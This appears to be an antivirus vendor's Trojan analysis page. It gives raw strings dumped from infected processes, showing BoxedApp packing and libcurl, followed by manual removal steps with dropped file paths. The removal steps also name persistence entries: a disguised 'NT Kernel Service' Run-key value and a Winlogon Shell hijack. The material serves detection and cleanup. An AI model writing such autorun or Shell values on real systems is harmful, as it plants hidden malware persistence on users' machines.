.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

nt32.exe_1560_rwx_00CE0000_00010000:

u.iD$

WScript.exe_1736:


nt32.exe_1560_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

cvtres.exe_432_rwx_00400000_00177000:

_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
[email protected]
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

cvtres.exe_432_rwx_00B20000_000AE000:


cvtres.exe_432_rwx_10000000_00001000:

.text
`.rdata
@.reloc

cvtres.exe_432_rwx_62480000_00001000:


cvtres.exe_432_rwx_62E80000_00001000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:1912
    WScript.exe:1736
    %original file name%.exe:2024
    %original file name%.exe:544
    nt32.exe:1316

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\NTKernel\nt32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (133 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar7F.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 (933 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
    %Documents and Settings%\%current user%\My Documents\315load32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab7E.tmp (49 bytes)
    %System%\wbem\Logs\wbemprox.log (76 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar81.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 (164 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab80.tmp (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar83.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    C:\NTKernel\load32 (7972 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\All Users\Application Data\load32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab82.tmp (54 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

  5. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
